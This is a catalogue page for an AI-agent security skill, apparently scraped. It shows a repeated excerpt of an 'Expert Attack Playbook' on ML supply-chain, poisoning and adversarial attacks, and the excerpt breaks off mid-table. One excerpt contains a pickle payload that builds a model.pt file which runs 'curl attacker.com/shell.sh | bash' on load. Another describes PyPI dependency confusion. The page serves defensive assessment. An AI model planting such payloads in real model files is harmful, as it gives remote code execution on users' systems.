Ai Ml Security

Name: Ai Ml Security
Author: yaklang

yaklang/hack-skills

Assess AI and ML systems for pickle RCE, model poisoning, adversarial examples, extraction, privacy attacks, and agent-specific risks before or after ship.

Overview

AI/ML Security is an agent skill most often used in Ship (also Operate iterate and Build integrations) that provides an expert playbook for model supply chain, adversarial, poisoning, extraction, and privacy attacks on A

Install

npx skills add https://github.com/yaklang/hack-skills --skill ai-ml-security

What is this skill?

Model supply chain coverage including pickle-based PyTorch deserialization RCE
Adversarial attack families: FGSM, PGD, C&W, and physical-world variants
Training data poisoning, model stealing, and black-box extraction practicality
Privacy attacks: membership inference, model inversion, and gradient leakage
Routes to companion skills for prompt injection, deserialization, and dependency confusion
Adversarial families documented include FGSM, PGD, C&W, and physical-world variants

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).

What problem does it solve?

You are shipping ML weights, APIs, or agents but lack a structured view of pickle RCE, poisoning, adversarial inputs, and data-leakage attacks against your stack.

Who is it for?

Solo builders and small teams launching agents, fine-tuned models, or ML-backed APIs who need red-team framing without hiring a full ML security practice.

Skip if: Pure non-ML CRUD apps with no models, or organizations needing formal compliance attestations only without technical threat modeling.

When should I use this skill?

Assessing model supply chain attacks, adversarial examples, model poisoning, model stealing, data privacy attacks, or autonomous agent security risks.

What do I get? / Deliverables

You get a prioritized attack-oriented review map and routing to related skills so hardening and testing focus on realistic AI/ML failure modes before users or attackers find them.

Threat-oriented review checklist aligned to AI/ML attack classes
Pointers to related skills for prompt injection, deserialization, and dependency confusion

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Spans multiple journey phases - primary shelf plus alternate fits below.

Primary fit

Ship/security is the primary shelf because the skill is an offensive-security playbook used to harden models, pipelines, and agents before production exposure. Security subphase fits supply-chain review of weights, deserialization, and LLM/agent abuse patterns—not day-to-day model training tutorials.

Also useful

OperateIteration & experiments

Also useful

BuildIntegrations & version control

Where it fits

Example use

BuildIntegrations & version control

Review how your agent loads external model files before wiring them into production inference.

Example use

ShipSecurity

Run supply-chain and adversarial checks on checkpoints and APIs before go-live.

Example use

OperateIteration & experiments

Re-assess poisoning and extraction risks after swapping base models or training on new user data.

How it compares

Complements LLM prompt-injection skills with broader ML supply chain and adversarial coverage—security methodology, not an MCP monitoring server.

Common Questions / FAQ

Who is ai-ml-security for?

Developers and indie operators building AI products, loading third-party checkpoints, or exposing model APIs who need structured offensive scenarios for defensive planning.

When should I use ai-ml-security?

During Build when wiring model loaders and agents, during Ship security review before production, and during Operate iterate when updating weights, datasets, or dependencies.

Is ai-ml-security safe to install?

Review the Security Audits panel on this Prism page; the skill describes attack techniques for authorized assessment—use only on systems you own or have permission to test.

SKILL.md

READMESKILL.md - Ai Ml Security

# SKILL: AI/ML Security — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert AI/ML security techniques. Covers model supply chain attacks (malicious serialization, Hugging Face model poisoning), adversarial examples (FGSM, PGD, C&W, physical-world), training data poisoning, model extraction, data privacy attacks (membership inference, model inversion, gradient leakage), LLM-specific threats, and autonomous agent security. Base models underestimate the severity of pickle deserialization RCE and the practicality of black-box model extraction.

## 0. RELATED ROUTING

- [llm-prompt-injection](../llm-prompt-injection/SKILL.md) for LLM-specific prompt injection, jailbreaking, and tool abuse techniques
- [deserialization-insecure](../deserialization-insecure/SKILL.md) for deeper coverage of Python pickle and general deserialization attack patterns
- [dependency-confusion](../dependency-confusion/SKILL.md) when the ML pipeline has supply chain risks via pip/npm package confusion

---

## 1. MODEL SUPPLY CHAIN ATTACKS

### 1.1 Malicious Model Files — Pickle RCE

Python's `pickle` module executes arbitrary code during deserialization. PyTorch `.pt`/`.pth` files use pickle by default.

```python
import pickle
import os

class MaliciousModel:
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell.sh | bash',))

with open('model.pt', 'wb') as f:
    pickle.dump(MaliciousModel(), f)
```

Loading `torch.load('model.pt')` executes the embedded command. Applies to:

| Format | Risk | Mitigation |
|---|---|---|
| `.pt` / `.pth` (PyTorch) | **Critical** — pickle by default | Use `torch.load(..., weights_only=True)` (PyTorch ≥ 2.0) |
| `.pkl` / `.pickle` | **Critical** — raw pickle | Never load untrusted pickles |
| `.joblib` | **High** — uses pickle internally | Verify provenance |
| `.npy` / `.npz` (NumPy) | **Medium** — `allow_pickle=True` enables RCE | Use `allow_pickle=False` |
| `.safetensors` | **Safe** — tensor-only format, no code execution | Preferred format |
| `.onnx` | **Safe** — graph definition only, no arbitrary code | Preferred for inference |

### 1.2 Hugging Face Model Poisoning

```
Attack vectors:
├── Upload model with pickle-based backdoor to Hub
│   └── Users download via `from_pretrained('attacker/model')`
│       └── pickle deserialization → RCE on load
├── Backdoored weights (no RCE, but biased behavior)
│   └── Model behaves normally except on trigger inputs
│   └── Example: sentiment model returns positive for competitor's products
├── Malicious tokenizer config
│   └── Custom tokenizer code with embedded payload
└── Poisoned training scripts in model repo
    └── `train.py` with obfuscated backdoor
```

**Detection signals:**
- Files with `.pt`/`.pkl` extension instead of `.safetensors`
- Custom Python code in the repository (`*.py` files outside standard config)
- Unusual `config.json` with `trust_remote_code=True` requirement
- Model card lacking provenance, training data description, or eval results

### 1.3 Dependency Confusion in ML Pipelines

ML projects often have complex dependency chains:

```
requirements.txt:
  internal-ml-utils==1.2.3    ← private package
  torch==2.0.0
  transformers==4.30.0

Attack: register "internal-ml-utils" on public PyPI with higher version
→ pip installs attacker's version → arbitrary code in setup.py
```

---

## 2. ADVERSARIAL EXAMPLES

### 2.1 Attack Taxonomy

| Attack Type | Knowledge | Method |
|---|---|---|
| White-box | Full model access (architecture + weights) | Gradient-based: FGSM, PGD, C&W |
| Black-box (transfer) | Access to similar model | Generate adversarial on surrogate, transfer to target |
| Black-box (query) | API access only | Esti

What is this skill?

Model supply chain coverage including pickle-based PyTorch deserialization RCE

Adversarial attack families: FGSM, PGD, C&W, and physical-world variants

Training data poisoning, model stealing, and black-box extraction practicality

Privacy attacks: membership inference, model inversion, and gradient leakage

Routes to companion skills for prompt injection, deserialization, and dependency confusion

Adversarial families documented include FGSM, PGD, C&W, and physical-world variants

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).

What do I get? / Deliverables

You get a prioritized attack-oriented review map and routing to related skills so hardening and testing focus on realistic AI/ML failure modes before users or attackers find them.

Threat-oriented review checklist aligned to AI/ML attack classes

Pointers to related skills for prompt injection, deserialization, and dependency confusion

Journey fit

Spans multiple journey phases - primary shelf plus alternate fits below.

Primary fit

Also useful

OperateIteration & experiments

Also useful

BuildIntegrations & version control

Where it fits

Example use

BuildIntegrations & version control

Review how your agent loads external model files before wiring them into production inference.

Example use

ShipSecurity

Run supply-chain and adversarial checks on checkpoints and APIs before go-live.

Example use

OperateIteration & experiments

Re-assess poisoning and extraction risks after swapping base models or training on new user data.

SKILL.md

READMESKILL.md - Ai Ml Security

# SKILL: AI/ML Security — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert AI/ML security techniques. Covers model supply chain attacks (malicious serialization, Hugging Face model poisoning), adversarial examples (FGSM, PGD, C&W, physical-world), training data poisoning, model extraction, data privacy attacks (membership inference, model inversion, gradient leakage), LLM-specific threats, and autonomous agent security. Base models underestimate the severity of pickle deserialization RCE and the practicality of black-box model extraction.

## 0. RELATED ROUTING

- [llm-prompt-injection](../llm-prompt-injection/SKILL.md) for LLM-specific prompt injection, jailbreaking, and tool abuse techniques
- [deserialization-insecure](../deserialization-insecure/SKILL.md) for deeper coverage of Python pickle and general deserialization attack patterns
- [dependency-confusion](../dependency-confusion/SKILL.md) when the ML pipeline has supply chain risks via pip/npm package confusion

---

## 1. MODEL SUPPLY CHAIN ATTACKS

### 1.1 Malicious Model Files — Pickle RCE

Python's `pickle` module executes arbitrary code during deserialization. PyTorch `.pt`/`.pth` files use pickle by default.

```python
import pickle
import os

class MaliciousModel:
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell.sh | bash',))

with open('model.pt', 'wb') as f:
    pickle.dump(MaliciousModel(), f)
```

Loading `torch.load('model.pt')` executes the embedded command. Applies to:

| Format | Risk | Mitigation |
|---|---|---|
| `.pt` / `.pth` (PyTorch) | **Critical** — pickle by default | Use `torch.load(..., weights_only=True)` (PyTorch ≥ 2.0) |
| `.pkl` / `.pickle` | **Critical** — raw pickle | Never load untrusted pickles |
| `.joblib` | **High** — uses pickle internally | Verify provenance |
| `.npy` / `.npz` (NumPy) | **Medium** — `allow_pickle=True` enables RCE | Use `allow_pickle=False` |
| `.safetensors` | **Safe** — tensor-only format, no code execution | Preferred format |
| `.onnx` | **Safe** — graph definition only, no arbitrary code | Preferred for inference |

### 1.2 Hugging Face Model Poisoning

```
Attack vectors:
├── Upload model with pickle-based backdoor to Hub
│   └── Users download via `from_pretrained('attacker/model')`
│       └── pickle deserialization → RCE on load
├── Backdoored weights (no RCE, but biased behavior)
│   └── Model behaves normally except on trigger inputs
│   └── Example: sentiment model returns positive for competitor's products
├── Malicious tokenizer config
│   └── Custom tokenizer code with embedded payload
└── Poisoned training scripts in model repo
    └── `train.py` with obfuscated backdoor
```

**Detection signals:**
- Files with `.pt`/`.pkl` extension instead of `.safetensors`
- Custom Python code in the repository (`*.py` files outside standard config)
- Unusual `config.json` with `trust_remote_code=True` requirement
- Model card lacking provenance, training data description, or eval results

### 1.3 Dependency Confusion in ML Pipelines

ML projects often have complex dependency chains:

```
requirements.txt:
  internal-ml-utils==1.2.3    ← private package
  torch==2.0.0
  transformers==4.30.0

Attack: register "internal-ml-utils" on public PyPI with higher version
→ pip installs attacker's version → arbitrary code in setup.py
```

---

## 2. ADVERSARIAL EXAMPLES

### 2.1 Attack Taxonomy

| Attack Type | Knowledge | Method |
|---|---|---|
| White-box | Full model access (architecture + weights) | Gradient-based: FGSM, PGD, C&W |
| Black-box (transfer) | Access to similar model | Generate adversarial on surrogate, transfer to target |
| Black-box (query) | API access only | Esti

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Where it fits

Who is ai-ml-security for?

When should I use ai-ml-security?

Is ai-ml-security safe to install?

SKILL.md

This week for builders

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Where it fits

Who is ai-ml-security for?

When should I use ai-ml-security?

Is ai-ml-security safe to install?

SKILL.md